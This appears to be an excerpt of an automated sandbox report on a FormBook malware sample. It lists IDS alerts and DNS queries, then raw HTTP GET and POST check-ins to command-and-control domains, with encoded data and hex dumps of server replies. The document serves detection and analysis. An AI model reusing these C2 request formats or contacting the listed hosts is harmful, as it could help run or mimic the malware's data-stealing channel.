            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 54.183.209.210:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49781 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 38.55.112.70:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49782 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 82.221.128.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 13.248.169.48:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.nevsehir-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr HTTP/1.1Host: www.nosr.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM= HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /csz1/?lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr HTTP/1.1Host: www.nevsehir-nakliyat.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo= HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr HTTP/1.1Host: www.kryto.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /efkd/?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1Host: www.angelenterprise.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr HTTP/1.1Host: www.dyme.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /3cch/?3ry=nj20Xr&lt=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1Host: www.lilibetmed.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr HTTP/1.1Host: www.mbwd.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /dw6h/?lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xr HTTP/1.1Host: www.fvti.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr HTTP/1.1Host: www.sorriragora.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /6ua2/?3ry=nj20Xr&lt=ROgFOn87xawaO6SZL50JuAl1kKxTrphupTX70ShDOCtjrPizjlCh9yM4paCu7ldqJbY3adTxPonHhY9dmNlpIFS90RvvBYO2gPQCKrVy+PqJYkpukQev2c8= HTTP/1.1Host: www.jyourwd.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficDNS traffic detected: DNS query: www.nosr.net
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.complexity.pub
            Source: global trafficDNS traffic detected: DNS query: www.nevsehir-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.kryto.top
            Source: global trafficDNS traffic detected: DNS query: www.angelenterprise.biz
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.lilibetmed.online
            Source: global trafficDNS traffic detected: DNS query: www.mbwd.store
            Source: global trafficDNS traffic detected: DNS query: www.terrearcenciel.online
            Source: global trafficDNS traffic detected: DNS query: www.fvti.cloud
            Source: global trafficDNS traffic detected: DNS query: www.theaji.shop
            Source: global trafficDNS traffic detected: DNS query: www.sorriragora.online
            Source: global trafficDNS traffic detected: DNS query: www.jyourwd.store
            Source: unknownHTTP traffic detected: POST /4c7j/ HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 199Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.complexity.pubReferer: http://www.complexity.pub/4c7j/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530Data Raw: 6c 74 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 4c 41 77 52 66 78 61 6d 63 7a 71 61 4b 51 64 6f 2f 4c 36 73 31 6c 36 58 59 75 57 71 69 53 6b 4d 41 3d 3d Data Ascii: lt=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 02:51:29 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 02:51:57 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 02:51:59 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 02:52:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Mon, 09 Sep 2024 02:52:04 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html 